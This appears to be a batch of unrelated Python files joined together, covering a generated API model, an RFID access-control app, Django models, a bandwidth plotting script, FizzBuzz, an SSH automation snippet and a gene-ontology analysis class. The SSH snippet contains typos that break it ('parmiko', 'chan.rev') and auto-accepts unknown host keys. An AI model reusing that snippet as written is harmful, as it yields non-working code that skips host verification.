"""Sets the include_generated_by_access_client of this BaseTransQueryFilters.
Flag indicating whether to include or not the generated transfer. Only valid if there is at least one access client specified. For example if a `ticket` or `paymentRequest` was processed then a new transfer will be generated. # noqa: E501
:param include_generated_by_access_client: The include_generated_by_access_client of this BaseTransQueryFilters. # noqa: E501
:type: bool
"""
self._include_generated_by_access_client = include_generated_by_access_client
@property
def from_current_access_client(self):
"""Gets the from_current_access_client of this BaseTransQueryFilters. # noqa: E501
Flag indicating whether to include only transfers by the current access client. # noqa: E501
:return: The from_current_access_client of this BaseTransQueryFilters. # noqa: E501
:rtype: bool
"""
return self._from_current_access_client
@from_current_access_client.setter
def from_current_access_client(self, from_current_access_client):
"""Sets the from_current_access_client of this BaseTransQueryFilters.
Flag indicating whether to include only transfers by the current access client. # noqa: E501
:param from_current_access_client: The from_current_access_client of this BaseTransQueryFilters. # noqa: E501
:type: bool
"""
self._from_current_access_client = from_current_access_client
@property
def amount_range(self):
"""Gets the amount_range of this BaseTransQueryFilters. # noqa: E501
The minimum / maximum amount. Is expressed an array, with the lower bound as first element, and the upper bound as second element. When only one element, will have just the lower bound. To specify only the upper bound, prefix the value with a comma. # noqa: E501
:return: The amount_range of this BaseTransQueryFilters. # noqa: E501
:rtype: list[BigDecimal]
"""
return self._amount_range
@amount_range.setter
def amount_range(self, amount_range):
"""Sets the amount_range of this BaseTransQueryFilters.
The minimum / maximum amount. Is expressed an array, with the lower bound as first element, and the upper bound as second element. When only one element, will have just the lower bound. To specify only the upper bound, prefix the value with a comma. # noqa: E501
:param amount_range: The amount_range of this BaseTransQueryFilters. # noqa: E501
:type: list[BigDecimal]
"""
self._amount_range = amount_range
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(BaseTransQueryFilters, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, BaseTransQueryFilters):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, BaseTransQueryFilters):
return True
return self.to_dict() != other.to_dict()
|
"""
Created on Jan 25, 2018
@author: Siyuan Qi
Description of the file.
"""
from . import grammarutils
from .generalizedearley import GeneralizedEarley
__all__ = ('grammarutils', 'GeneralizedEarley') |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import sys, os
from TouchStyle import *
import MFRC522
import ftrobopy
# the output ports
GREEN = 0
RED = 2
MOTOR = 4
# This is the default key for authentication
KEY = [0xFF,0xFF,0xFF,0xFF,0xFF,0xFF]
def dummy_reader():
# Scan for cards
(status,TagType) = MIFAREReader.MFRC522_Request(MIFAREReader.PICC_REQIDL)
# If a card is found
if status == MIFAREReader.MI_OK:
print("Card detected")
# Get the UID of the card
(status,uid) = MIFAREReader.MFRC522_Anticoll()
# If we have the UID, continue
if status == MIFAREReader.MI_OK:
# Print UID
print("Card read UID: "+str(uid[0])+","+str(uid[1])+","+str(uid[2])+","+str(uid[3]))
# Select the scanned tag
MIFAREReader.MFRC522_SelectTag(uid)
# Authenticate
status = MIFAREReader.MFRC522_Auth(MIFAREReader.PICC_AUTHENT1A, 8, KEY, uid)
# Check if authenticated
if status == MIFAREReader.MI_OK:
MIFAREReader.MFRC522_Read(8)
MIFAREReader.MFRC522_StopCrypto1()
else:
print("Authentication error")
class SetupDialog(TouchDialog):
def __init__(self,reader, parent):
TouchDialog.__init__(self, "Setup", parent)
vbox = QVBoxLayout()
vbox.addStretch()
self.MIFAREReader = reader
lbl = QLabel(QCoreApplication.translate("setup", "Name:"))
lbl.setObjectName("smalllabel")
vbox.addWidget(lbl)
self.name = QLineEdit("")
self.name.setMaxLength(15)
vbox.addWidget(self.name)
vbox.addStretch()
lbl = QLabel(QCoreApplication.translate("setup", "Permission:"))
lbl.setObjectName("smalllabel")
vbox.addWidget(lbl)
self.check = QCheckBox(QCoreApplication.translate("setup", "enable"))
vbox.addWidget(self.check)
vbox.addStretch()
lbl = QLabel(QCoreApplication.translate("setup",
"Place card in front of reader to write data."))
lbl.setObjectName("tinylabel")
lbl.setWordWrap(True)
lbl.setAlignment(Qt.AlignCenter)
vbox.addWidget(lbl)
self.centralWidget.setLayout(vbox)
self.done = False
# start a qtimer to check for a tag to write
self.timer = QTimer(self)
self.timer.timeout.connect(self.on_timer)
self.timer.start(100)
def on_timer(self):
(status,TagType) = self.MIFAREReader.MFRC522_Request(self.MIFAREReader.PICC_REQIDL)
if status != self.MIFAREReader.MI_OK:
return
# Get the UID of the card
(status,uid) = self.MIFAREReader.MFRC522_Anticoll()
# If we have the UID, continue
if status != self.MIFAREReader.MI_OK:
return
# Select the scanned tag
self.MIFAREReader.MFRC522_SelectTag(uid)
# Authenticate
status = self.MIFAREReader.MFRC522_Auth(self.MIFAREReader.PICC_AUTHENT1A, 8, KEY, uid)
# Check if authenticated
if status == self.MIFAREReader.MI_OK:
# Variable for the data to write
data = []
# Fill the data with 0xFF
for x in range(0,16):
data.append(0)
if self.check.isChecked():
data[0] = 0x42;
for i in range(len(self.name.text())):
data[i+1] = ord(self.name.text()[i])
if self.MIFAREReader.MFRC522_Write(8, data):
self.done = True
self.MIFAREReader.MFRC522_StopCrypto1()
self.MIFAREReader.MFRC522_Request(self.MIFAREReader.PICC_REQIDL)
if self.done:
self.timer.stop()
print("closing")
self.close()
class FtcGuiApplication(TouchApplication):
def __init__(self, args):
TouchApplication.__init__(self, args)
translator = QTranslator()
path = os.path.dirname(os.path.realpath(__file__))
translator.load(QLocale.system(), os.path.join(path, "rfid_"))
self.installTranslator(translator)
# create the empty main window
self.w = TouchWindow("RFID")
self.vbox = QVBoxLayout()
self.vbox.addStretch()
try:
self.MIFAREReader = MFRC522.MFRC522()
if not self.MIFAREReader.MFRC522_Present():
self.MIFAREReader = None
except IOError:
self.MIFAREReader = None
if not self.MIFAREReader:
lbl = QLabel(QCoreApplication.translate("main",
"Unable to connect to " +
"RC522 RFID reader.\n\n" +
"Make sure one is " +
"connected via USB or I²C."))
lbl.setObjectName("smalllabel")
lbl.setWordWrap(True)
lbl.setAlignment(Qt.AlignCenter)
self.vbox.addWidget(lbl)
else:
# get access to TXTs IOs if present
txt_ip = os.environ.get('TXT_IP')
if txt_ip == None: txt_ip = "localhost"
try:
self.txt = ftrobopy.ftrobopy(txt_ip, 65000)
except:
self.txt = None
menu = self.w.addMenu()
self.menu_cfg = menu.addAction(QCoreApplication.translate("menu", "Setup card"))
self.menu_cfg.triggered.connect(self.setup)
self.label = QLabel("")
self.label.setObjectName("smalllabel")
self.label.setAlignment(Qt.AlignCenter)
self.vbox.addWidget(self.label)
self.icon = QLabel("")
self.icon.setAlignment(Qt.AlignCenter)
self.vbox.addWidget(self.icon)
self.name = QLabel("")
self.name.setObjectName("smalllabel")
self.name.setAlignment(Qt.AlignCenter)
self.vbox.addWidget(self.name)
self.setState("searching")
# start a qtimer to poll the sensor
self.timer = QTimer(self)
self.timer.timeout.connect(self.on_timer)
self.timer.start(100)
# and a timer to handle lamps and motors
self.io_timer = QTimer(self)
self.io_timer.timeout.connect(self.on_io_event)
self.io_timer.setSingleShot(True)
self.io_state = None
self.vbox.addStretch()
self.w.centralWidget.setLayout(self.vbox)
self.w.show()
self.exec_()
def on_io_event(self):
if self.io_state == "open":
self.txt.setPwm(MOTOR,0)
self.io_state = "wait"
self.io_timer.start(2000)
elif self.io_state == "wait":
self.txt.setPwm(MOTOR+1,400)
self.txt.setPwm(GREEN,0)
self.io_state = "close"
self.io_timer.start(1000)
elif self.io_state == "close":
self.txt.setPwm(MOTOR+1,0)
self.io_state = None
elif self.io_state == "light":
self.txt.setPwm(RED,0)
self.io_state = None
def setup(self):
self.timer.stop()
dialog = SetupDialog(self.MIFAREReader, self.w)
dialog.exec_()
# wait 2 seconds before scanning again
self.timer.start(2000)
def setState(self, state, message = None):
icon = None
if state == "searching":
self.label.setText(QCoreApplication.translate("status", "Searching ..."))
icon = "searching"
if state == "ok":
self.label.setText(QCoreApplication.translate("status", "Accepted!"))
icon = "granted"
if self.txt:
self.txt.setPwm(GREEN,512)
self.txt.setPwm(MOTOR,400)
self.io_state = "open"
self.io_timer.start(1000) # wait one second
if state == "nok":
self.label.setText(QCoreApplication.translate("status", "Denied!"))
icon = "denied"
if self.txt:
self.txt.setPwm(RED,512)
self.io_state = "light"
self.io_timer.start(1000) # wait one second
if icon:
name = os.path.join(os.path.dirname(os.path.realpath(__file__)), icon + ".png")
pix = QPixmap(name)
self.icon.setPixmap(pix)
if message:
self.name.setText(message)
else:
self.name.setText("")
def on_timer(self):
(status,TagType) = self.MIFAREReader.MFRC522_Request(self.MIFAREReader.PICC_REQIDL)
if status != self.MIFAREReader.MI_OK:
self.setState("searching")
self.timer.start(100)
return
# Get the UID of the card
(status,uid) = self.MIFAREReader.MFRC522_Anticoll()
# If we have the UID, continue
if status != self.MIFAREReader.MI_OK:
self.setState("searching")
self.timer.start(100)
return
print("UID:", uid)
print("Card read UID: "+str(uid[0])+","+str(uid[1])+","+str(uid[2])+","+str(uid[3]))
# Select the scanned tag
self.MIFAREReader.MFRC522_SelectTag(uid)
# Authenticate
status = self.MIFAREReader.MFRC522_Auth(self.MIFAREReader.PICC_AUTHENT1A, 8, KEY, uid)
# Check if authenticated
if status == self.MIFAREReader.MI_OK:
data = self.MIFAREReader.MFRC522_Read(8)
if data:
# wait a second before scanning again
print("Received:", data)
name = ""
for i in range(1,15):
if data[i]:
name = name + chr(data[i])
# check if data contains a valid "access token"
if data[0] == 0x42:
self.setState("ok", name)
else:
self.setState("nok", name)
self.timer.start(1000)
else:
self.setState("searching")
self.MIFAREReader.MFRC522_StopCrypto1()
else:
# this happens most likely since the user removed
# the card early
self.setState("searching")
return
self.MIFAREReader.MFRC522_Request(self.MIFAREReader.PICC_REQIDL)
if __name__ == "__main__":
FtcGuiApplication(sys.argv)
|
from helper import *
import plot_defaults
from matplotlib.ticker import MaxNLocator
from pylab import figure
import os, re, string
parser = argparse.ArgumentParser()
parser.add_argument('--dir', '-d',
help="Directory where data exist",
required = True)
args = parser.parse_args()
dirs = [f for f in os.listdir(args.dir)]
data = []
for d in dirs:
plen = int(re.match('p-([0-9]+)', d).group(1))
testd = [f for f in os.listdir(os.path.join(args.dir, d))]
aggregated = 0.0
for test in testd:
file_path = os.path.join(args.dir, d, test, "result.txt")
with open(file_path, 'r') as result_file:
aggregated += float(result_file.readlines()[1].strip())
aggregated /= len(testd)
aggregated /= 1.5
data.append([plen, aggregated])
m.rc('figure')
fig = figure()
ax = fig.add_subplot(111)
def getkey(item):
return item[0]
data_sort = sorted(data, key=getkey)
xaxis = map(float, col(0, data_sort))
yaxis = map(float, col(1, data_sort))
ax.plot(xaxis, yaxis, lw=2)
plt.ylabel("Aggregated Normalized Bandwidth")
plt.xlabel("Inter-burst DoS Period(ms)")
plt.grid(True)
plt.tight_layout()
plt.savefig(args.dir + ".png")
|
"""Return fizzbuzz list until the number from input."""
from __future__ import print_function
def fizz_buzz(number):
"""Return a list containing fizzbuzz list."""
lists = []
for i in range(1, number + 1):
if i % 3 == 0 and i % 5 == 0:
lists.append("FizzBuzz")
elif i % 3 == 0:
lists.append("Fizz")
elif i % 5 == 0:
lists.append("Buzz")
else:
lists.append(str(i))
return ",".join(lists)
def main():
"""Give a natural number to print the fizzbuzz list."""
while True:
user_input = input("Please write a natural number: ")
# check if input is not number
if user_input == "exit":
exit(0)
try:
print(fizz_buzz(int(user_input)))
except ValueError:
print("This is not a natural number!")
if __name__ == "__main__":
main()
|
import paramiko
import time
ssh = parmiko.SSHClient()
ssh.load_system_host_keys()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect('ipaddress', username='username',password='password')
chan = ssh.invoke_shell()
chan.send('show version\r')
while not chan.recv_ready():
time.sleep(5)
out = chan.recv(99999)
print (out.decode("ascii"))
chan.send('scope chassis\r')
chan.send('show psu\r')
while not chan.recv_ready():
time.sleep(5)
out = chan.rev(99999)
print (out.decode("ascii"))
ssh.close()
|
def frequencySort(self, s: str) -> str:
c_cnts = collections.Counter(s).most_common()
return ''.join(c*cnt for c, cnt in c_cnts) |
from django.db.models import *
from django.contrib.auth.models import User
priority = [
('Normal', 'Normal'),
('High', 'High'),
('Urgent', 'Urgent'),
('Immediate', 'Immediate'),
]
payment_status = [
('Waiting For Payment', 'Waiting For Payment'),
('Paid', 'Paid'),
('Payment Canceled', 'Payment Canceled'),
('In Progress', 'In Progress'),
]
site_status = [
('Under Review', 'Under Review'),
('Approved', 'Approved'),
('Declined', 'Declined'),
]
addedby = [
('Admin', 'Admin'),
('User', 'User')
]
class Page(Model):
title = TextField(default='', blank=False, null=False, verbose_name='title')
pagerole = TextField(default='', blank=False, null=False, verbose_name='pagerole')
description = TextField(default='', blank=True, null=True, verbose_name='description')
created = DateTimeField(auto_now_add=True)
class Site(Model):
user = ForeignKey(User, on_delete=CASCADE, default=None)
name = TextField(default='', blank=False, null=False, verbose_name='name')
webaddress = TextField(default='', blank=False, null=False, verbose_name='webaddress')
websitelanguage = TextField(default='', blank=False, null=False, verbose_name='websitelanguage')
websitetraffic = TextField(default='', blank=True, null=True, verbose_name='websitetraffic')
site_status = TextField(default='', choices=site_status, blank=False, null=False, verbose_name='site_status')
created = DateTimeField(auto_now_add=True)
class Widget(Model):
site = ForeignKey('Site', related_name='widgets', on_delete=CASCADE, null=True)
name = TextField(default='', blank=False, null=False, verbose_name='name')
widgettitle = TextField(default='', blank=False, null=False, verbose_name='widgettitle')
type = TextField(default='', blank=False, null=False, verbose_name='type')
subtype = TextField(default='', blank=True, null=True, verbose_name='subtype')
column = TextField(default='', blank=True, null=True, verbose_name='column')
rows = TextField(default='', blank=True, null=True, verbose_name='rows')
wid = TextField(default='', blank=True, null=True, verbose_name='subtype')
css = TextField(default='', blank=True, null=True, verbose_name='css')
created = DateTimeField(auto_now_add=True)
class Support(Model):
user = ForeignKey(User, on_delete=CASCADE, default=None)
subject = TextField(default='', blank=False, null=False, verbose_name='subject')
priority = TextField(default='', choices=priority, blank=False, null=False, verbose_name='priority')
status = TextField(default='', blank=False, null=False, choices=site_status, verbose_name='site_status')
created = DateTimeField(auto_now_add=True)
class Message(Model):
support = ForeignKey('Support', related_name='messages', on_delete=CASCADE, null=True)
text = TextField(default='', blank=False, null=False, verbose_name='text')
addedby = TextField(default='', choices=addedby,blank=False, null=False, verbose_name='addedby')
created = DateTimeField(auto_now_add=True)
class Payment(Model):
user = ForeignKey(User, on_delete=CASCADE, default=None)
total = TextField(default='', blank=False, null=False, verbose_name='total')
payment_status = TextField(default='', choices=payment_status, blank=False, null=False,
verbose_name='payment_status')
created = DateTimeField(auto_now_add=True)
class Paypal(Model):
user = ForeignKey(User, on_delete=CASCADE, default=None)
type = TextField(default='', blank=False, null=False, verbose_name='type')
currency = TextField(default='', blank=False, null=False, verbose_name='currency')
country = TextField(default='', blank=False, null=False, verbose_name='country')
paymentthreshold = TextField(default='', blank=False, null=False, verbose_name='paymentthreshold')
payeename = TextField(default='', blank=False, null=False, verbose_name='payeename')
paypalemail = TextField(default='', blank=False, null=False, verbose_name='paypalemail')
payeephone = TextField(default='', blank=False, null=False, verbose_name='payeephone')
payeeaddress = TextField(default='', blank=False, null=False, verbose_name='payeeaddress')
created = DateTimeField(auto_now_add=True)
class Epayment(Model):
user = ForeignKey(User, on_delete=CASCADE, default=None)
type = TextField(default='', blank=False, null=False, verbose_name='type')
paymentthreshold = TextField(default='', blank=False, null=False, verbose_name='paymentthreshold')
ewallet = TextField(default='', blank=False, null=False, verbose_name='ewallet')
created = DateTimeField(auto_now_add=True)
class Payoneer(Model):
user = ForeignKey(User, on_delete=CASCADE, default=None)
type = TextField(default='', blank=False, null=False, verbose_name='type')
paymentthreshold = TextField(default='', blank=False, null=False, verbose_name='paymentthreshold')
payeename = TextField(default='', blank=False, null=False, verbose_name='payeename')
country = TextField(default='', blank=False, null=False, verbose_name='country')
paypalemail = TextField(default='', blank=False, null=False, verbose_name='paypalemail')
created = DateTimeField(auto_now_add=True)
class Webmoney(Model):
user = ForeignKey(User, on_delete=CASCADE, default=None)
type = TextField(default='', blank=False, null=False, verbose_name='type')
currency = TextField(default='', blank=False, null=False, verbose_name='currency')
paymentthreshold = TextField(default='', blank=False, null=False, verbose_name='paymentthreshold')
wmz = TextField(default='', blank=False, null=False, verbose_name='wmz')
created = DateTimeField(auto_now_add=True)
class RfCompany(Model):
companyname = TextField(default='', blank=False, null=False, verbose_name='companyname')
bannerloads = PositiveIntegerField(default=0)
clicks = PositiveIntegerField(default=0)
date = DateField(auto_now_add=True)
time = TimeField(auto_now_add=True)
created = DateTimeField(auto_now_add=True)
class DashboardCompany(Model):
companyname = TextField(default='', blank=False, null=False, verbose_name='companyname')
bannerloads = PositiveIntegerField(default=0)
clicks = PositiveIntegerField(default=0)
date = DateField(auto_now_add=True)
time = TimeField(auto_now_add=True)
created = DateTimeField(auto_now_add=True)
class Revenue(Model):
companyname = TextField(default='', blank=False, null=False, verbose_name='companyname')
date = DateField(auto_now_add=True)
time = TimeField(auto_now_add=True)
totalmoney = PositiveIntegerField(default=0)
created = DateTimeField(auto_now_add=True)
|
from math import sqrt
q=int(input("ENTER NUMBER OF INPUTS"))
list=[]
for i in range(q):
q1=int(input())
list.append(q1)
C=50
H=30
for i in list:
D=sqrt(((2 * C * i)/H))
print(round(D)) |
directory = dict()
first = 'chris'
last = 'gidden'
number = 2
directory[last, first] = number
print(number)
for last, first in directory:
print(first, last, directory[last,first]) |
from station import StationList
from zoopla import Zoopla
from zoopla.exceptions import ZooplaAPIException
import os
zoopla = Zoopla(api_key=os.environ['ZOOPLA_KEY'], verbose=True)
for station in StationList().stations:
name = '{} Station'.format(station.name)
latitude, longitude = station.parse_location()
try:
prices = zoopla.average_area_sold_price({
'latitude': str(latitude),
'longitude': str(longitude),
'order': 'ascending',
'page_number': 1,
'page_size': 1
})
except ZooplaAPIException as e:
print(e)
continue
print(prices)
#
# for result in search.listing:
# print(result.price)
# print(result.description)
# print(result.image_url)
#
# for j in Journey.objects().order_by('best'):
# print(j)
#
|
# Generated by Django 2.2.7 on 2019-12-01 10:04
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('polls', '0006_auto_20191201_1749'),
]
operations = [
migrations.AddField(
model_name='question',
name='start_date',
field=models.DateTimeField(default=django.utils.timezone.now, verbose_name='Starts at : '),
),
migrations.DeleteModel(
name='Choice',
),
]
|
#!/usr/bin/env python
import numpy as np
############################################################### Periodic boundary utility
#periodic boundary for relative position vector
def wrap( vector, box ):
return vector - np.floor( vector / box + 0.5 ) * box
|
"""
Contains all the tools necessary to map GO ontology and Pathway classification from the
database to an Adjacency and Laplacian graph.
"""
import hashlib
import json
import pickle
import random
import string
import math
import datetime
from collections import defaultdict
from copy import copy
from random import shuffle, sample
from csv import reader
from itertools import combinations, chain
from pprint import PrettyPrinter
from random import shuffle
from time import time
import traceback, sys
from typing import Union, Tuple, List
import numpy as np
from scipy.sparse import lil_matrix, triu
from scipy.sparse.csgraph import shortest_path
from bioflow.algorithms_bank import conduction_routines as cr
from bioflow.configs import main_configs as confs
from bioflow.configs.main_configs import Dumps, NewOutputs
from bioflow.sample_storage.mongodb import insert_annotome_rand_samp
from bioflow.molecular_network.InteractomeInterface import InteractomeInterface
from bioflow.neo4j_db.GraphDeclarator import DatabaseGraph
from bioflow.utils.gdfExportInterface import GdfExportInterface
from bioflow.utils.io_routines import dump_object, undump_object, get_background_bulbs_ids
from bioflow.utils.log_behavior import get_logger
from bioflow.algorithms_bank import sampling_policies
from bioflow.algorithms_bank.flow_calculation_methods import general_flow,\
reduce_and_deduplicate_sample, evaluate_ops, reduce_ops
from bioflow.algorithms_bank.sampling_policies import characterize_flow_parameters, _is_int
log = get_logger(__name__)
# a pair of debug functions
def _characterise(_object):
print('Object of size %s and type %s' % (len(_object), type(_object)))
def _characterise_mat(matrix):
print('Matrix of shape %s, type %s and has %s non-zero terms, min is %s, max is %s' % \
(matrix.shape, type(matrix), len(matrix.nonzero()[0]), '<>', '<>'))
class GeneOntologyInterface(object):
"""
Interface between annotome in the knowledge database and the annotome graph laplacian. It is
heavily skewed towards the Gene Ontology, although can be adapted to be more general than that.
:param namespace_filter: which namespaces will be used from the annotome (by default the
"biological process" of the Gene Ontology)
:param background: (optional) background that will be used for sampling of random
nodes to build a comparison interface for the
:param correction_factor:informativity of the node computation correction factors
(information entropy-wise). (Multiplicative correction factor, additive correction factor)
:param ultraspec_clean: if the terms considred too specific are excluded
:param ultraspec_lvl: how many uniprots have to be annotated by a term (directly or
indirectly) for it not to be considered too specific
"""
# REFACTOR: [BKI normalization]: move to neo4j parse/insertion types
_go_up_types = ["is_a_go", "is_part_of_go"]
_go_reg_types = ["is_Regulant"]
def __init__(self,
namespace_filter=confs.env_bki_filter,
background=(),
correction_factor=confs.env_bki_correlation_factors,
ultraspec_clean=confs.env_bki_ultraspec_clean,
ultraspec_lvl=confs.env_bki_ultraspec_lvl):
self.go_namespace_filter = list(namespace_filter)
self._background = background
log.debug('_background set to %d' % len(background))
self.correction_factor = correction_factor
self.ultraspec_cleaned = ultraspec_clean
self.ultraspec_lvl = ultraspec_lvl
self.init_time = time()
self.partial_time = time()
self.entity_2_terms_neo4j_ids = defaultdict(list)
self.known_up_ids = set()
self.term_2_entities_neo4j_ids = defaultdict(list)
self.all_nodes_neo4j_ids = []
self.node_id_2_mat_idx = {}
self.mat_idx_2_note_id = {}
self.total_entropy = None
self._limiter_reachable_nodes_dict = {}
self._limiter_up_2_go_reachable_nodes = {}
self._limiter_go_2_up_reachable_nodes = {}
self._limiter_up_2_go_step_reachable_nodes = {}
self._limiter_go_2_up_step_reachable_nodes = {}
self._limiter_go_2_weighted_ent = {}
self.neo4j_id_2_display_name = {}
self.neo4j_id_2_legacy_id = {}
self.legacy_id_2_neo4j_id = {}
self.up_neo4j_id_2_leg_id_disp_name = {}
self.adjacency_matrix = np.zeros((2, 2))
self.dir_adj_matrix = np.zeros((2, 2))
self.laplacian_matrix = np.zeros((2, 2))
self.inflated_laplacian = np.zeros((2, 2))
self.inflated_idx2lbl = {}
self.inflated_lbl2idx = {}
self.binding_intensity = 0
# REFACTOR [stateless]: this needs to be passed as an argument, not a persistent variable
self._active_up_sample: List[int] = []
self._active_weighted_sample: List[Tuple[int, float]] = []
self._secondary_weighted_sample: Union[None, List[Tuple[int, float]]] = None
self._flow_calculation_method = general_flow
self._ops_evaluation_method = evaluate_ops
self._ops_reduction_method = reduce_ops
self.UP2UP_voltages = {}
self.uniprots_2_voltage = {}
self.current_accumulator = np.zeros((2, 2))
self.node_current = {}
char_set = string.ascii_uppercase + string.digits
self.thread_hex = ''.join(random.sample(char_set * 6, 6))
self.indep_lapl = np.zeros((2, 2))
log.info('Setting up GO Interface with namespaces %s and %s background UPs',
self.go_namespace_filter, len(self._background))
def pretty_time(self):
"""
Times the execution
:return: tuple containing the time since the creation of the Matrix_getter object and
since the last cal of function formatted as string
:rtype: str
"""
it, pt = (round(time() - self.init_time),
round(time() - self.partial_time))
pload = 'total: %s m %s s, \t partial: %s m %s s' % (
int(it) / 60, it % 60, int(pt) / 60, pt % 60)
self.partial_time = time()
return pload
def _time(self):
pt = time() - self.partial_time
return pt
def reset_thread_hex(self):
"""
Reset the hex identifier of the object. used when multiprocessing
:return:
"""
char_set = string.ascii_uppercase + string.digits
self.thread_hex = ''.join(sample(char_set * 6, 6))
def _dump_statics(self):
dump_object(
confs.Dumps.GO_builder_stat,
(self.go_namespace_filter,
self._background,
# it does dump the _background from which it will attempt to rebuild itself.
self.correction_factor,
self.ultraspec_cleaned,
self.ultraspec_lvl))
@staticmethod
def _undump_statics():
return undump_object(confs.Dumps.GO_builder_stat)
def dump_core(self):
# print(type(self.entity_2_terms_neo4j_ids))
# print(type(self.term_2_entities_neo4j_ids))
# print(type(self.deprecated_SeedSet))
# print(type(self._limiter_reachable_nodes_dict))
# print(type(self.neo4j_id_2_display_name))
# print(type(self.neo4j_id_2_legacy_id))
# print(type(self.legacy_id_2_neo4j_id))
# print(type(self.all_nodes_neo4j_ids))
# print(type(self.node_id_2_mat_idx))
# print(type(self.mat_idx_2_note_id))
# print(type(self.up_neo4j_id_2_leg_id_disp_name))
# print(type(self.deprecated_UPs_without_GO))
dump_object(
confs.Dumps.GO_dump,
(self.entity_2_terms_neo4j_ids,
self.term_2_entities_neo4j_ids,
self._limiter_reachable_nodes_dict,
self.neo4j_id_2_display_name,
self.neo4j_id_2_legacy_id,
self.legacy_id_2_neo4j_id,
self.all_nodes_neo4j_ids,
self.node_id_2_mat_idx,
self.mat_idx_2_note_id,
self.up_neo4j_id_2_leg_id_disp_name))
def _undump_core(self):
self.entity_2_terms_neo4j_ids, self.term_2_entities_neo4j_ids, self._limiter_reachable_nodes_dict, \
self.neo4j_id_2_display_name, self.neo4j_id_2_legacy_id, self.legacy_id_2_neo4j_id, self.all_nodes_neo4j_ids, \
self.node_id_2_mat_idx, self.mat_idx_2_note_id, self.up_neo4j_id_2_leg_id_disp_name =\
undump_object(confs.Dumps.GO_dump)
self.known_up_ids = self.entity_2_terms_neo4j_ids.keys()
def _dump_matrices(self):
dump_object(
confs.Dumps.GO_Mats,
(self.adjacency_matrix,
self.dir_adj_matrix,
self.laplacian_matrix))
def _undump_matrices(self):
self.adjacency_matrix, self.dir_adj_matrix, self.laplacian_matrix = undump_object(
confs.Dumps.GO_Mats)
def _dump_informativities(self):
dump_object(
confs.Dumps.GO_Infos,
(self._limiter_up_2_go_reachable_nodes,
self._limiter_go_2_up_reachable_nodes,
self._limiter_up_2_go_step_reachable_nodes,
self._limiter_go_2_up_step_reachable_nodes,
self.GO2_Pure_Inf,
self._limiter_go_2_weighted_ent))
def _undump_informativities(self):
self._limiter_up_2_go_reachable_nodes, self._limiter_go_2_up_reachable_nodes, self._limiter_up_2_go_step_reachable_nodes, \
self._limiter_go_2_up_step_reachable_nodes, self.GO2_Pure_Inf, self._limiter_go_2_weighted_ent = \
undump_object(confs.Dumps.GO_Infos)
def _dump_inflated_elements(self):
dump_object(
confs.Dumps.GO_Inflated,
(self.inflated_laplacian,
self.inflated_idx2lbl,
self.inflated_lbl2idx,
self.binding_intensity))
def _undump_inflated_elements(self):
self.inflated_laplacian, self.inflated_idx2lbl, \
self.inflated_lbl2idx, self.binding_intensity = \
undump_object(confs.Dumps.GO_Inflated)
def _dump_memoized(self):
md5 = hashlib.md5(
json.dumps(sorted(self._active_up_sample), sort_keys=True).encode('utf-8')).hexdigest()
payload = {
'UP_hash': md5,
'sys_hash': self.md5_hash(),
'UPs': pickle.dumps(self._active_up_sample),
'currents': pickle.dumps((self.current_accumulator, self.node_current)),
'voltages': pickle.dumps(self.uniprots_2_voltage)}
dump_object(confs.Dumps.GO_Analysis_memoized, payload)
@staticmethod
def _undump_memoized():
"""
:return: undumped memoized analysis
"""
return undump_object(confs.Dumps.GO_Analysis_memoized)
def _dump_independent_linear_sets(self):
dump_object(confs.Dumps.GO_Indep_Linset, self.indep_lapl)
def _undump_independent_linear_sets(self):
self.indep_lapl = undump_object(confs.Dumps.GO_Indep_Linset)
def full_rebuild(self):
"""
Performs a complete rebuild of the InterfaceClass Instance based on parameters provided
upon construction based on the data in the knowledge database. Upon rebuild saves a copy
that can be rapidly resurrected with the fast_load() method
:return: None
"""
self.annotome_access_and_structure()
self.get_go_adjacency_and_laplacian()
self.get_go_reach()
if self.ultraspec_cleaned:
self.filter_out_too_specific()
self.get_laplacians()
self.inflate_matrix_and_indexes()
self._dump_statics()
self.dump_core()
self._dump_matrices()
self._dump_informativities()
self._dump_inflated_elements()
if self._background:
if _is_int(self._background[0]):
self._background = list(set(self.known_up_ids).intersection(set(self._background)))
else:
self._background = [(_id, _weight)
for _id, _weight in self._background
if _id in self.known_up_ids]
else:
self._background = list(self.known_up_ids)
log.info('Finished rebuilding the GO Interface object %s', self.pretty_time())
def fast_load(self):
"""
Rapidly resurrects the InterfaceClass Instance based on parameters provided
upon construction. If parameters are mismatched, raises exceptions signalling what
parameters were mismatched., Trims the background provided upon construction down to what
actually be sampled (self._background)
:raise Exception: wrong filtering namespace parameter
:raise Exception: wrong correction factor parameter
:raise Exception: wrong ultraspec cleaned parameter
:raise Exception: wrong ultraspec level parameter
"""
namespace_filter, initial_set, correction_factor, ultraspec_cleaned, ultraspec_lvl = \
self._undump_statics()
if self.go_namespace_filter != namespace_filter:
log.critical("Wrong Filtering attempted to be recovered from storage.\n"
"\tsaved: %s\n"
"\tcurrently active: %s" % (namespace_filter, self.go_namespace_filter))
raise Exception(
"Wrong Filtering attempted to be recovered from storage")
if self.correction_factor != correction_factor:
log.critical("Wrong correction factor attempted to be recovered from storage")
raise Exception(
"Wrong correction factor attempted to be recovered from storage")
if self.ultraspec_cleaned != ultraspec_cleaned:
log.critical(
"Ultraspecific terms leveling state is not the same in the database as requested")
raise Exception(
"Ultraspecific terms leveling state is not the same in the database as requested")
if self.ultraspec_lvl != ultraspec_lvl:
log.critical(
"Ultraspecific terms leveling cut-off is not the same in the database as requested")
raise Exception(
"Ultraspecific terms leveling cut-off is not the same in the database as requested")
self._undump_core()
